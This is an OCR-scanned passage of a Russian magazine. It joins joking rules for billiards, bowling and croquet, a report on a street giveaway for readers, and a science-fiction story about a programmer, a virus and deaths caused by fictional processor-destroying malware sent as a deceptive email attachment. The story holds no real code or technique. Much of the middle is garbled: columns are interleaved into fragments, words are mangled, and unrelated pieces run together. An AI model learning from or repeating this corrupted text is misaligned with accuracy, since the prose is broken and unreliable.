на самом деле. 

За все эти мелкие недочеты ты просто жертвуешь ударом, 
но если с тобой произойдет один из подобных промахов, 
то, боюсь, что партия будет безвозвратно проиграна: 

- Черный шар попадает в незаказанную лузу (это самая 
большая засада - стоило играть всю партию, чтобы проиг- 
рать ее на последнем ударе). 

- При одновременном ии черного и белого шаров 
в лузы. 

- Вылет «восьмерки» за пределы поля, кроме разбития. 
Так что, дорогой читатель, если будешь играть в бильярд в 
предместьях Бронкса или где-нибудь эдак в районе Гарлема, 
помни о том, что делать нельзя. При этом, правда, нужно 
учитывать, что сколько бильярдных столов - столько правил. 
А вообще бильярд - очень интересная и интеллектуальная, 
нах, игра. 


|| 
В общем-то, здесь все просто - берешь шар и катишь его по 
направлению к кеглям. Чем больше сбиваешь - тем, соот- 
ветственно, лучше. На самом деле все сложнее - боулинг 
это не только кегли, это свой отдельный самостоятельный 
стиль. К тому же совершенно необязательно катать шары, 
чтобы носить боулинговые авоськи, набитые всякой вся- 
чиной и щеголять новыми боулинговыми ботинками. OT- 
дельное спасибо братьям Коэнам. Так что, выходя на до- 
рожку, помни о том, что на тебе должны быть хорошие бо- 
тинки, специальная рубашка - и поэтому ты должен быть 
абсолютно позитивным. Причем, чем позитивнее, тем луч- 
ше. Главное - никогда никуда не спешить, а все остальное 
приложится. Самое главное - иногда полизывать шар. 

В принципе, в боулинг можно играть где угодно и в чем 
угодно. Например, в игрушечный боулинг - купив краде- 
ные кегли перед «Детским миром» - там даже правила не 
нужны. Причем никакие - хотя если очень хочется, то не- 
достающие правила можно придумать. 

Для тех же, кто решил идти в настоящий взрослый боу- 
линг, - мы составили небольшой свод правил, следуя кото- 
рым, можно играть в эту игру. 
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1. Если ты идешь в боулинг во второй раз - то следует 
иметь с собой собственные ботинки, чтобы ими щеголять, 
собственную сумку, чтобы в ней носить собственный шар. 
2. Если перед броском полизать шар, то он полетит более 
плавно и точно. 

3. Если уж ты решился полизать шар, то он должен быть 
только твоим, во избежание того, чтобы его больше никто 
не лизал. 

4. За каждую сбитую кеглю начисляются очки. 

5. Обычно тебе дается два броска за ход. За эти два брос- 
ка ты должен сбить все кегли. Если не смог - ты лузер. Вся 
партия состоит их 10 ходов (frames). 

6. Если ты кинул шар и сбил все десять кеглей, это назы- 
вается страйк. Страйк - это очень хорошо, так как ты полу- 
чаешь два дополнительных призовых удара. 

7. Очки с этих двух ударов зачисляются следующим обра- 
зом: 10 очков + количество всех сбитых кеглей в двух по- 
следующих ударах. 

8. Если ты сделал два страйка подряд, можно требовать с 
бармена кружку пива нахаляву. Пусть только попробует 
не налить. 

9. Если вторым ударом ты сбил все кегли, это называется 
Spare. Spare дает возможность одного дополнительного 
удара, что само по себе тоже не плохо. 

10. Максимальная сумма очков за одну партию - 300, т.е. 
12 страйков подряд. Если у тебя такое получается, то тебе 
не нужно читать этот кусок. Начинай чтение с крокета. 


КЕТ 

Для настоящего крокета He нужны розовые фламинго в ка- 
честве клюшек, карточные человечки вместо ворот И 
книжка Кэрролла вместо томика с правилами. 

Сыграть В крокет ДОВОЛЬНО просто. Для этого нужно ЛИШЬ 
несколько нехитрых приспособлений: восемь специальных 
MOJIOTKOB Ha длинной ручке (за неимением пойдет восемь 
старых затупленных колунов), восемь деревянных шаров 


диаметром около 8-ми сантиметров с одной, двумя и тремя 
красными и черными полосками, два колышка (стругать са- 
мому однозначно!) и несколько проволочных ворот (в 
сельской местности пойдут и каркасы для парника). 
Смысл игры состоит в том, чтобы ударами молотка по шару 
провести свой шар через ряд проволочных ворот, располо- 
женных в определенном порядке на ровной земляной 
поверхности размером примерно 11 на 5 метров. 

Играют: от 2 до 8 человек. Вначале делят все шары между 
игроками. Первым бьет играющий первым красным ша- 
ром, затем первым черным, вторым красным, вторым 
черным и т.д. Huzza: бросать шар по воздуху или подтал- 
кивать. Существует правило: коснулся - бей. Так что тут уж 
ничего не попишешь :-). 

Ворота пройдены, если шар полностью прошел под ними. 
Если же шар остался в воротах, то его нужно срочно, бук- 
вально следующим ходом, выбить обратно. А когда придет 
очередь нового удара, снова пробить через эти ворота. Ес- 
ли вдруг шар коснется стоек ворот, проходя через них, - то 
ничего страшного. 
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Cama игра состоит в том, чтобы протащить свои шары к KO- 
лышку противника, а потом - с таким же триумфом вер- 
нуться обратно. Первым, заметь, первым! 

Вначале шар ставится в любом месте между первыми во- 
ротами и колышком. 

Бьют - по очереди. Сначала ты, потом - тебя :). Если про- 
шел одни ворота - бей еще раз, прошел двое ворот сразу - 
можно бить дважды. 

Дальше - как в бильярде - показываешь на ворота, объяв- 
ляешь, что бьешь через них - и вперед, the Winner is - ну, 
сам понимаешь, кто... 

Если ты прошел через все ворота, но еще не прикоснулся 
к своему колышку, то ты - «разбойник» - можно помочь 
партнерам занять выгодные позиции и поднапакостить 
противникам, отбивая их шары в стороны. 

В общем, для того чтобы команда выиграла, нужно прове- 
сти все свои шары до чужих кольев и обратно, что, на са- 
мом деле, не так-то просто. 

Самое главное, чтобы ворота He убегали, а фламинго не 
пытались клюнуть тебя в руку - силу характера нужно 


Игры с шарами 


иметь недюжинную. Так что... Follow The White Rabbit, 
джентльмены! 


КАК ЭТО ВЫГЛЯДЕЛО 


Если честно, попытка сделать классический «хороший и 
качественный» фотоматериал почти сразу провалилась. 
Идей было множество: например, взять фотоаппарат и 
съездить в профессиональную бильярдную, и взять интер- 
вью у настоящих бильярдистов. Или, например, прийти в 
боулинг-клуб и взять интервью у настоящих боулингови- 
ков. Или... Ну, в общем, закончилось все как обычно. Мы 
взяли 0.5 чудодейственной настойки «Ягермайстер» на 59 
травах, призы, которые дала компания Руссобит-М: ком- 
пьютерные игры и майки с игровой символикой, пластмас- 
совые кегли, купленные по сэйлам перед «Детским ми- 
ром» у скупщиков краденого, и отправились на улицы. 
Практически - к вам, наши дорогие читатели Спеца. «Сво- 
его читателя нужно знать в лицо!» - гласит неписаное пра- 
вило, так что мы подходили к мало-мальски «спецовым» 


людям, выставляли перед ними кегли и предлагали сыг- 
рать в игрушечный боулинг. К сожалению, игрушечного 
бильярда скупщики краденого не продавали, так что уж 
чем богаты - тем и рады. Правила, в соответствии с кото- 
рыми мы предлагали людям сыграть в «наш» боулинг, бы- 
ли на удивление просты: если ты сбиваешь все кегли, то 
получаешь призы - игрушки и майки. Если сбиваешь не 
все - то в любом случае получаешь все призы. И все это 
только для читателей Спеца. Плэйбоевцев и прочих чита- 
телей приходилось отгонять поганой метлой :-). А «спе- 
цовцы» радовались и участвовали. Так что где-то в 3.40 по 
московскому времени акции «Игрушечный боулинг - боу- 
линг для всех. Выиграй не попав!» был дан старт. 

В процессе съемок я выяснил несколько важных на буду- 
щее вещей: 

- Японцы удивительно неспециальный народ. 

- Если за ними бежать - то они будут бежать от тебя. 

- Если пытаться им что-то крикнуть вдогонку на плохом 
английском, они начнут понимающе удивляться и ничего 
не скажут. Разве что прибавят шагу. 

- Если в разгар холодного московского октября, на площа- 
ди у Большого, ты хочешь предложить японцам сыграть в 
«игрушечный боулинг», то, скорее всего, они просто убе- 
гут. Но убегут улыбаясь. 

- Все японцы очень вежливые. Все время улыбаются и 
убегают. 

В общем, после того, как я отчаялся найти хотя бы одного 
японца, который бы читал Спец и хотел выиграть приз, мы 
все переместились на площадь у городской Думы и стали 
завлекать читателей Спеца - будущих участников нашей 
акции. 

Первым оказался сварщик, варивший какую-то дверь. 


Да, необходимое пояснение: мы - на сей раз не только я и 
НоА. А еще Донор и X-Tracer - так что было совсем весело. 
К тому же вдвоем на такую охоту идти стремно. Поэтому 
ходили вчетвером. Чтобы не страшно было. И релаксно. 
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ПОГРАНИЧНАЯ СТРАЖА 


Что-то тяжелое и железное за стеной упало на пол. Вадим вздрог- 
нул. Было ощущение, что это «что-то» грохнулось о кафель практи- 
чески у него под ногами, хотя здесь, в пустом коридоре, падать бы- 
ло нечему. 
-...Черт бы побрал эти ножницы, - продолжил тем временем мужчина 
за стеной. - На чем я остановился? 

- «Повреждения, описанные в пункте «два»...» - ответил женский го- 
лос. 
Да-да, вспомнил! «Повреждения, описанные в пункте «два», потер- 
певшая получила в течение краткого... краткого...» Успеваете? 
«Краткого периода времени. В скобках - «одновременно»». 

Сухой кашель курильщика. Вадим нервно теребил пальцы на руках - 
в тех пределах, которые позволяли наручники. То, что он сейчас 
слышал, добивало его окончательно. 
- «В связи с этим установить очередность повреждений не представ- 
ляется возможным», - откашлявшись, продолжил диктовать мужчи- 
на. 
Там, за дверью, шло вскрытие. Вадим знал это, знал они ту женщи- 
ну, чью грудную клетку зашивал сейчас огромной изогнутой иглой 
патологоанатом, надиктовывая протокол лаборантке. Но лучше все- 
го он знал, зачем он здесь. 
- Следующий пункт. «Получив повреждения, описанные в пункте 
«два», потерпевшая могла жить в пределах от нескольких десятков 
секунд до нескольких десятков минут... 

«Три, - подумал Вадим, комментируя слова патологоанатома. - Три 
минуты». 

- «..и совершать при этом активные действия... В скобках - «пере- 
двигаться, звать на помощь». 
Лаборантка тихо шелестела бумагой за низеньким столом. Вадим видел 
ее образ сквозь стену так четко, будто стоял у нее за спиной. 

- Где там этот мальчишка? - неожиданно прервав свой жуткий моно- 
nor, спросил судебный медик. - Пусть заходит, а вы пока готовьте 
конвертики для волос... 
Откуда-то сбоку к Вадиму приблизился конвоир в бронежилете, ше- 
вельнул дулом укороченного автомата. Вадим понял все без слов. 
Поднялся, стиснув зубы, - очень не хотелось входить в эту дверь, из 
которой волнами накатывали очень неприятные сладковатые запа- 
хи. 


- С правой височной области, - услышал Вадим голос в двух шагах 
от двери. - Теперь с левой... 

- Доктор, зачем все это? - спросила лаборантка, протягивая листок 
бумаги, сложенный в виде пакетика. Судебник вырвал пинцетом не- 
сколько волос, сунул их в протянутый пакетик и ответил несколько 
раздраженно: 
- Следователь задницу прикрывает... И хватит этих вопросов, в ко- 
ридоре подозреваемый... Готовьте пакетики для ногтей, я стригу 
правую кисть. 
Вадим остановился у самой двери, не в силах сделать последние 
шаги. В горле встал большой тягучий комок слюны, он никак не хо- 
гел проглатываться, накатила паника. Вадим отшатнулся назад и 
наткнулся на ствол автомата. Пришлось собрать волю в кулак и пе- 
решагнуть порог прозекторской. 

Там царил полумрак, только два источника света делили комнату на 
части - огромная бестеневая лампа над секционным столом и на- 
стольный светильник лаборантки у закрашенного белой краской на 
две трети окна. В пятне света головой к двери лежала женщина, до- 
статочно бледная для того, чтобы казаться нереальной. Голова ее 
была запрокинута назад через деревянный брусок, который Вадим 
про себя сразу же окрестил плахой - за выемку посредине, как на 
гильотине. Под спиной образовалась большая розовая лужа - пато- 
логоанатом смывал с тела кровь при помощи душевого шланга, раз- 
брызгивая ее довольно широко вокруг стола. Самого врача защи- 
щал огромный, до пола, оранжевый фартук и резиновые сапоги; Ва- 
им и его сопровождающий непроизвольно сделали несколько ша- 
гов назад, чтобы не попасть в облако брызг. 

Не сразу заметив вошедших, врач остановился, закрутил кран и 
приблизился к Вадиму, глядя ему в глаза. 

- Мне всегда было интересно, - сказал он, подойдя вплотную, - на- 
сколько это просто - убить человека. Разрезать пополам мертвое 
тело - это не то... Работая здесь, я начал ценить жизнь как никогда 
ранее - и поэтому не могу победить в себе ту волну возмущения, ко- 
торая поднимается во мне, когда я вижу безвременно ушедших. 
Вадим не ожидал подобного. Он рассчитывал только взглянуть на... 
«На Марину...». И после этого вернуться в следственный изолятор. 
Тем временем врач, сняв перчатки со следами крови, взял Вадима 
за руку и подвел к женскому телу на столе. 
Несомненно, это была Марина. Но такой он ее не видел никогда... 
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ПОГРАНИЧНАЯ СТРАНА 


- Смотри, - подтолкнул его к столу судебник. - Ей было двадцать два 
года. И ей теперь всегда будет двадцать два года... 

Вадим приблизился к столу на пару шагов и оказался в пятне света. 
Наручники сверкнули ему зайчиками в глаза, он отодвинул руки в 


сторону; после чего заглянул ей в лицо - в то, что осталось от лица... 


Его, конечно, сумели подхватить. Конвоир, закинув автомат за спи- 
ну, успел подставить руку, да и патологоанатом был тоже рядом. 
Вадим мягко опускался вниз, подгибая колени. 

Его вынесли в коридор, несколько раз ударили по щекам. Он мотнул 
головой из стороны в сторону, ударился затылком о стену и оконча- 
тельно пришел в себя. Несмотря на слабость, решительно встал, 
вернулся в прозекторскую, подписал акт опознания и вопроситель- 
но взглянул на милиционера. Тот бросил последний взгляд на ту, что 
лежала сейчас на столе, и воткнул ствол Вадиму между лопаток - у 
охранника дома подрастала дочь, уже учится в третьем классе, 
мальчишки табором за ней ходят... 
- Иди давай, - грозно произнес он в спину Вадима. Тот сделал не- 
сколько шагов и все-таки не выдержал - разрыдался как ребенок, 
уткнувшись в стену лбом. 
Конвоир попытался подтолкнуть Вадима, но тот нервно, не огляды- 
ваясь, отмахнулся от автомата скованными руками и опустился по 
стене на пол, продолжая исторгать из себя стоны и рыдания, хрип- 
лые и протяжные... 

Все было неправильно. Все было зря. 

Из дверей на него угрюмо смотрел патологоанатом. Он опять не по- 
HAN, зачем одни люди убивают других. 


РЕТРОСПЕКТИВА 


«СММ, 24 марта 2019 года. 
Всю прогрессивную общественность потрясло известие о таинст- 
венной гибели профессора Макартура, жившего на своей вилле в 
штате Калифорния. Отойдя от дел, профессор периодически пре- 
подавал в университете теорию анализа, проповедуя свои ради- 
кальные взгляды на проблемы программирования... Он был найден 
мертвым у своего компьютера, который по каким-то причинам ока- 
зался разобранным - Макартур, никогда не заглядывающий вглубь 
электронной техники, по одному ему известному поводу взял в руки 
отвертку... Таинственности добавляет тот факт, что процессор его 
компьютера оказался в нерабочем состоянии по причине полной пе- 
рестройки внутренней архитектуры... Данным моментом сейчас тща- 
тельно занимаются эксперты... Заслугами Макартура перед науч- 
ным миром являются...». 
«СММ, 2 апреля 2019 года. 
Очередная загадочная смерть - сегодня утром в своем рабочем ка- 
бинете по не известной пока причине скончался один из ведущих 
разработчиков корпорации «Глобал сенсорик» Ким Паркер, извест- 
ный своими разработками в сфере... OH был найден мертвым за CBO- 
им рабочим столом; в правой руке он сжимал самую обыкновенную 
отвертку, в левой - видеокарту, добытую им из своего компьютера... 
Вспоминая недавнюю смерть профессора Макартура, наступившую 
по до сих пор не выясненным причинам, остается упомянуть, что ви- 
деопроцессор представлял собой просто кусок кремния без следов 
внутренней архитектуры... Следствие ведут лучшие специалисты в 
области информационных преступлений...». 


Он был необычайно талантлив, этот студент - Вадим Гостюхин, уча- 
щийся четвертого курса Академии программирования и анализа. 
Его ставили в пример всем, начиная от абитуриентов и заканчивая 
маститыми учеными, сдающими докторский минимум. Защищая дис- 
сертации, считалось хорошим тоном упомянуть несколько откры- 
тий, сделанных Вадимом за годы его обучения, представить пару 
ссылок на его работы и на него самого. Сам Вадим этого старался 
не замечать, хотя был уверен в абсолютной справедливости проис- 
ходящего. 
Онне просто подавал надежды - он дарил их другим; дарил своим 
творчеством, виртуозным программированием, умением решать не- 
разрешимое и разгадывать неразгаданное. Его знание языков неда- 
лекого прошлого, таких, как Си, Паскаль и Ассемблер, подкупало 
даже тех профессоров, которые около тридцати лет назад воспи- 


тывались на них и присутствовали при смене поколений, - когда Гар- 
ри Краун создал Ассемблер-2, названный впоследствии Эс-Би (от 
английского «Second Breath» - «Второе дыхание»), язык, затмивший 
преимущества всех доселе существовавших языков программиро- 
вания. Он, зная в совершенстве Эс-Би, не забывал предтеч, зная в 
совершенстве практически все, что существовало ранее, и умея ре- 
шить все современные задачи на старых языках (хотя большинство 
его однокурсников и преподавателей не видели в этом никакого 
смысла - все равно что учить старославянский, имея «пять» по со- 
временному русскому языку). 
Короче говоря, он был ГЕНИАЛЕН. 
ло его же открытие. 

Вадим Гостюхин жил на стыке двух эпох - умирало одно, рождалось 
другое, принципиально новое. Заканчивалась эпоха персоналок, 
техника внедрялась в человека, становилась его частью, неотъем- 
лемой, как естественные органы - как кровь, глаза, сердце. Про- 
граммное обеспечение изменилось кардинально - перебои, что на- 
блюдались в работе продукции Майкрософт в течение последних 
тридцати лет в их версиях Windows, - тем перебоям просто уже не 
могло быть места. Зависнув, программа могла убить человека - не- 
позволительная роскошь для программиста, не говоря уже о самой 
жертве... 
Гарри Краун спас мир - он подарил нам всем язык программирова- 
ния, исключающий ошибки. Исключающий их в принципе. Существо- 
вание ошибки в программе, написанной на Эс-Би, было невозможно. 
Наконец-то все вздохнули свободно, широко и радостно - Windows 
стала идеальной, явив миру триумф компании Microsoft. К Tomy вре- 
мени Билл уже отошел от дел, готовясь к пути в мир иной (у него об- 
наружили рак), но его преемники, поставив на кон все, выиграли - 
Эс-Би победил всех и вся, затмив собой прелести периода объект- 
но-ориентированного подхода. И на высоте расцвета Ассемблера-2 
в мир ворвался сверкающей искоркой Вадим Гостюхин, Россия. 
Онвскрыл внутренности Эс-Би, показав всему миру, что может 
быть, когда гений обнаруживает неизведанное в том, что казалось 
абсолютно известным. Но это вскрытие для многих людей ничем не 
отличалось от вскрытия трупа на патологоанатомическом столе... 


‚ Как всякого гения, его погуби- 


Они встретились в одном из компьютерных клубов Москвы на тусов- 
ке, посвященной юбилею создания Эс-Би, - языку программирова- 
ния исполнилось всего десять лет, но он уже настолько изменил ход 
истории, что люди начали праздновать дату его создания. В течение 
последних пяти лет ежегодные торжественные мероприятия в среде 
TeX, «кто понимает», приобретали все более широкие масштабы. 
ного знакомых лиц, обилие «звезд» эстрады и суперпрограммис- 
гов, море коктейлей и шоколада - типичная атмосфера праздника, 
не изменившаяся за последние пятьдесят лет. «Золотая молодежь» 
отрывалась, порой забывая о причине, собравшей их всех вместе. 
узыка, звучавшая отовсюду; огромные мультимедийные экраны, 
гранслирующие великолепные видеоэффекты, созданные по по- 
следнему слову техники; возможность играть в интерактивные игры 
по высокоскоростным спутниковым каналам... 
Как обычно, через полчаса от начала торжества девяносто процен- 
гов приглашенных забывало об истинной цели празднества и отда- 
валось веселью с бесшабашностью, свойственной молодости. Но 
всегда находились те самые десять процентов, которые даже на 
фоне громко звучащей музыки и льющегося отовсюду мультимедий- 
ного безумия были способны поддержать беседу о создании проце- 
дур, методов, классов, событий и всего остального, являющегося 
неотъемлемым атрибутом программирования на Эс-Би. 
Эти люди, узнающие друг друга по горящему взгляду, по жестикуля- 
ции, рвущейся от самого сердца при упоминании волшебного соче- 
тания «Эс-Би», по огромному количеству работ, написанных на этом 
сказочном языке и названных их именами, часто проскальзывающи- 
ми в беседах... Они были особым «обществом в обществе»: каждый 
из них получал от пяти до десяти тысяч долларов за час работы на 
Ассемблере-2. Безусловно, все они были талантливы - но и среди та- 
лантов всегда находятся гении, к числу которых принадлежал и Ва- 
Дим. 
Его узнавали за много десятков шагов, в толпе, по звуку голоса, по 
манере одеваться - но чаще всего по его небрежным, но предельно 
точным замечаниям, которые он делал, проходя сквозь чью-нибудь 
беседу об очередном баге на Паскале, который обходится на Эс-Би 
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в два счета. При этом его совсем не интересовал ход беседы - он 


продвигался сквозь разно 


ухо просто не могло слышать чь 


шерс 


гную толпу к барной стойке, но его 
и-либо претенциозные замечания, 


сделанные на принципиально неправильной основе. Онс хитрой 


улыбкой исправлял заблуждение говорив 


жать в прицеле бармена, - 


рели ему в спину, и благоговейный шепот 
- Гостюхин... Это он открыл... Эт 


Shi) Onn. 


Самого Вадима это He интересовало - он 
стойке, заказывал себе какой-н 


и раз 


о его реш 


шего, не переставая дер- 
говор замирал сам собой, все смот- 
доносился вслед: 

ение оказалось лучшим... 


приближался к барной 
ибудь экзотический коктейль и огля- 


дывал зал в поисках особы, которой будет все равно, на каком язы- 


Ke онп 


лась о 


ишет по ночам вирусы, -л 
улыбчива - в общем, представляла собой 
Сегодня, как и обычно, такая нац 
на Мариной, о самом Вадиме была 


и 


шь быо 


лась довольно 


идеал 


наслы 


на была красива, стройна, 
клубной девушки. 


быстро. Представи- 


шана достаточно - в 


общем, знакомство было быстрым, в нужных пределах. Гостюхин не- 


МНОГО 


облас 


Посте 
щих 3H 


Дальше все было понятно. Такси примчал 
МОЙ... 


Потом, сидя в кресле, накрывшись простыней и разгляд 
стояния в несколько метров Марину, делаю 
омашнего бара, он решил ей о 
обал сенсорик», 


д 
картуре, и о «Гл 
рассказом, он не заметил 


душистая струйка... 
- Пока еще не знаю, что с 


расспросил ее об интерес 
ред ним программист файерволл 
ги было написано Мариной с использован 
крытых Крауном и улучшенных самим Вад 
пенно разговор из специальных областей 
акомых, потом перешел в область 


И 
‚ как 


этим д 


ах - ибыл пора 
(OB; одно 


гкрыться. И 


и 
ИМОМ. 


флирт 
о их об 


жен, узнав, что пе- 
из лучших творений в этой 


ем технологий, от- 


перекинулся на об- 
а, ну а затем... 


сих к Вадиму до- 


ывая с рас- 


щую пару коктейлей у 
рассказал все -ио Ма- 


много еще о чем. Поглощенный 


арина, широко раскры 
шает его, а из горлышка с дорогим ликером бежит на пол тоненькая 


в глаза, слу- 


елать, - задумчиво проговорил Ва- 


Оно гкинул одеяло, поднялся, подошел 


к бару и, налив себе стакан 


апельсинового сока, выпил его, не обращая внимания на боль в гор- 


ле. Жаль... Он был готов продолжить сн 
слушала его... 

Вернувшись к постели, он хотел завали 
сов, но тут его внимание привлек листок 
на стол 
проц 
почки, и протянул к листку ру 
фон и одновременно предчувст 
«ВАДИМ, НЕ ИЩИ МЕНЯ. Я ВН 
РА... МНЕ ОСТАЛОСЬ ЖИТЬ Н 
НАРУЖИЛИ У МЕНЯ «Эс-Би». 


у, надеяс 


РОСТИ 


Похмелье моментально слетело с Вадима. 


прочитал записку, написанную 
себя в том, что это все сон, что 


гвердым к 
это все п 


ние» СПИДа - открытый нескол 


МИЛЛИОНОВ Л 
удачных экспериментов - после чего вир 
правился гулять по миру... 

Ужас, охватив 


смял записку в кулак. Путь передачи бы 
следовательно... 

Первым желанием было бежать в клинику и сдать анализ - убедить- 
ся в том, что с ним все в порядке. Но где-то внутри трезвый расчет 


программиста убеждал в обратном - что еще рано, что перв 


цинации от своего прародителя, уже успел унест 
юдей. Все его первооткрыватели п 


Мей отношения - ведь она так 


ься спать еще на пару ча- 
бумаги, одиноко лежащий 


е возле клавиатуры. Вчера его там точно не было. Вадим 
лепал к столу босыми ногами, на ход 


у пытаясь попасть в та- 
ь увидеть там адрес и теле- 


вуя недоброе... 
МАТЕЛЬ 
ЕСКОЛЬК 


О СЛУШАЛА ТЕБЯ ВЧЕ- 
О МЕСЯЦЕВ - ВРАЧИ ОБ- 
РОЩАЙ 
Оннесколько раз вслух 
расивым почерком, убеждая 
роисходит не с ним. 


» 


- Эс-Би... - шептал он, глядя перед собой невидящими глазами. Ви- 
рус, названный так же, как и язык программирования, «второе дыха- 
ько лет назад, после тотальной вак- 


и жизни нескольких 
огибли во время не- 
ус вырвался на волю и от- 


ший Вадима, трудно передать словами. Дрожащие 
ноги не держали его - он упал в кресло у стола с персоналкой и 


л тот же, что uy СПИДа, - 


ые про- 


явления появятся («ПОЯВЯТСЯ!!») через пару месяцев, тогда же 


можно будет обнаружить в крови антитела. 


Страх - великая сила, двигатель прогресса наравне с рекламой. Ва- 


дим в конце. - Но ведь это работает и еще как... Так было и с вечным дим на одном из дисков нашел файрволл, написанный Мариной, ус- 
двигателем - вы сначала создайте его, а мы уже найдем для вашего тановил его и просмотрел информацию об авторе. 
открытия применение. «Protection of frontier Frewall - Marina Beskudnikova, Russia, 2018. All 
Марина вздрогнула, когда ледяная струя ликера мазнула ее по об- Rights reserved. Незаконное распространение преследуется по за- 
наженному бедру; увидев, что вылила на пол почти всю бутылку, она кону. Обо всех нарушениях авторского права незамедлительно со- 
прикрыла лужицу на ковре собой, но Вадим не обратил на это вни- общать по адресу marina@309.BB.0.0.F7/uDomains.ru». 
мания - он был поглощен своими мыслями. Второе название, русское, у файрволла было «Пограничная стра- 
Ошеломленная девушка постояла несколько минут с двумя бокала- жа» - примерно так можно перевести «Protection of frontier». Ho Вади- 
ми в руках, а потом подошла к Вадиму; они медленно выцедили ма не заинтересовало это красивое название - он впился глазами в 
сквозь зубы морозную ароматную жидкость, после чего она присе- адрес электронной почты, за которым надо было найти девушку, за- 
ла к нему на колени и жадно поцеловала его в холодные губы... разившую его страшным вирусом. 
Утро пришло как-то неожиданно - просто ворвалось в окно ярким Пальцы сами легли на клавиатуру, внесли адрес в адресную книгу и 
солнечным лучом и ударило по глазам. Вадим зажмурился, попытал- отправили тестовое письмо. За настройки Вадим не опасался - его 
ся отодвинуться в сторону - и вдруг понял, что постель рядом пуста, IP He смог бы определить никто, обратный адрес тоже подменялся 
Марины нет. Не открывая глаз, он позвал ее хриплым голосом - по- неоднократно, проходя через множество выдуманных им фильтров. 
сле нескольких ледяных коктейлей в горле першило. Ответом была Через мгновение подтверждение доставки всплыло посреди огром- 
тишина. ного двадцатипятидюймового экрана. Адрес существовал в действи- 
Вадим открыл глаза. Никого. Девушка ушла. тельности. Оставалось выяснить его географическое положение - 
вполне возможно, что сервер «309.BB.0.0.F7/uDomains.ru» мог пред- 
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Широко раздувая ноздри, OH, не мигая, смотрел в трей, где мигал значок соединения. 


лагать свои услуги где-то рядом. Но нет - ящик оказался вторичным - 
с него все форвардилось в неизвестном направлении, на защищен- 
ный адрес, идентифицировать который Вадим не смог - ведь против 
него сейчас играла опытная профессионалка. 

Вадимом овладело бешенство. Широко раздувая ноздри, он, не ми- 
гая, смотрел в трей, где мигал значок соединения. Мерцающий треу- 
гольник не давал отвести взгляд в сторону, где-то в груди росла вол- 
на гнева. Через несколько секунд он схватил «мышку» и, не глядя, 
выбрав адрес из списка своих контактов, отправил по нему письмо 
с вложением... 

«СММ. 22 апреля 2019 года. 

..К расследованию серии загадочных смертей подключен отдел 
ФБР, занимающийся аномальными явлениями... Очередной жертвой 
стал доцент, декан факультета Московской академии программиро- 
вания и анализа Виталий Измайлов. Секретарша нашла его в каби- 
нете мертвым... Последним его распоряжением стала просьба при- 
нести ему в кабинет отвертку, при помощи которой он по неизвест- 
ным причинам вскрыл корпус своего персонального компьютера и 
извлек из него материнскую плату... Признаков насильственной 
смерти, как и в предыдущих случаях, на теле Измайлова обнаруже- 
но не было...». 


Из отчета агента «Брайана» от 24 апреля 2019 года ответственному 
по группе дознания: 


«... Также сообщаю, что после окончания осмотра кабинета Измай- 
лова был изъят для детального изучения его персональный компью- 
тер. Ввиду полной непригодности для работы материнской платы 
все составляющие были перенесены на исправную базу... Компонен- 
ты признаны работоспособными... По окончании просмотра содер- 
жимого винчестера были обнаружены четыре письма, полученные 
доцентом Измайловым 22 апреля. Три из них оказались сообщения- 
ми служебного характера... Текст четвертого привожу полностью: 
«Дорогой Виталий! Шлю тебе, как ты и просил, очень интересный 
ехе'шник. Открывай, не опасаясь за свой комп. После инсталляции 
перекинь пару джамперов на «маме» - R19 и R21. С уважением, Ба- 
лабанов». Письмо подписано неким Балабановым, другом Измайло- 
ва по учебе в Новосибирске. Установлено, что обратный адрес пись- 
ма соответствует подписи на нем, но сам Балабанов в течение по- 
следних трех недель находится в Швеции на конгрессе... Вывод по 
состоянии набора схем системной логики будет сделан после осмо- 
тра его экспертами, хотя уже сейчас ясно, что полностью нарушена 
ее архитектура...». 


На следующий день Вадим не пошел на занятия. И через день - не 
пошел. Купив в магазине несколько бутылок водки, он беспробудно 
пьянствовал, поминая свою спокойную прежнюю жизнь, прерванную 
какой-то сволочью, заразившей его. В пьяном бреду перед ним про- 
плывали причудливо искаженные страницы его короткой насыщен- 
ной жизни. Окончание школы, внезапное увлечение программирова- 
нием; за лето он освоил несколько языков и успешно сдал вступи- 
тельные экзамены в Академию. 


Родители были немного взволнованы - их сын в мгнОвенье"бка БЛ: 
гением. Учителя успокаивали - ребенок просто очень удачно дУМел 
приложить свои знания и умения, не дожиЙаясь того часа, когда 
станет ясно, что вся жизнь отдана не люфимой работе, а чему-то 
случайно выбранному... В год постуряенИя/В Академию ибобычайно 
вырос рейтинг выпускников с фаКультета, занимабщегося`Ассеяб- 
лером-2 - и, естественно, Вадим, желая добитьсЯ славы на этом по- 
прище, выбрал именно этдт факультет. 

Исходя из его потенциБЛа, многие преподавателй были уверены - не 
создай Эс-Би Гарри Краум/ его/создетгОы Вадим Гостюхун. Изучив 
программу четырех кубсов_заВа года, в настоящийцомеиТ оного“ 
вился к досрочИым выпускным экзаменам`Жил он в одийфчесиве, 
снимая квартиру в центре Масквы - сначала не`без помо М ROAMTE 
лей, а потом денег, которые о\№стал зарабатывать\создавая прЗеку 
ты на заказ. В тЬчение последних вести месяцев WP Kar] недбынай 


но популярен - после создания приложения, фпособЯето контроли- 
ровать эмоциональный/фон человека. 

Он не был избалованнЫм/ но стал более треборательным; суммы го- 
нораров росли, появилибь агенты, продафщия!его программные TBO- 
рения. Ero расположени_добивались многиё/ главы кфрпораций, 
программисты, препфдаватели, красивые Ж#нщины, звезды эстра- 
ды, политики. Вадим ста чертовски пфпулярной личнастью; не BCA- 
кий мог похвастатьсяприватной перецифкрй с самим [арри Крау- 
ном; не всякий мог выгребзль из своега Пдчтового ящика десятки 
приглашений работать\на монстров комМьютерной Индустрии. У Ba- 
дима все это было в избытке. 

Однажды к нему обратился представитель корпораЦии/«Интел» с 
просьбой создать отладчик, спобобный изменять скарбсть процес- 
сора программно - путем Мерестройки его архитектуфигВ процессе 
работы. Причем перестройки гибкой, обраГимой - такой, какой мог 
бы пользоваться рядовой Пвльздватель не бояфь уничтожить доро- 
гостоящий процессор. 
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Вадим задумался над решением проблемы в принципе. Кое-что пока- 
залось ему невыполнимым - но лишь до тех пор, пока он не начал пи- 
сать программу. К его услугам были все образцы процессоров кор- 
порации, начиная с самых ранних, все архитектурные решения, мас- 
штабные модели некоторых узлов. Он погрузился в изучение самой 
структуры кремния, забрался в физику, химию, изучил протекание 
процессов на атомном уровне... 

Постепенно решение задачи начало вырисовываться - пока еще на 
черновиках, но самое главное - принцип - было найдено. Вадим су- 
мел не просто написать программу, изменяющую архитектуру про- 
цессора для регулировки скорости, - ему удалось создать нечто 
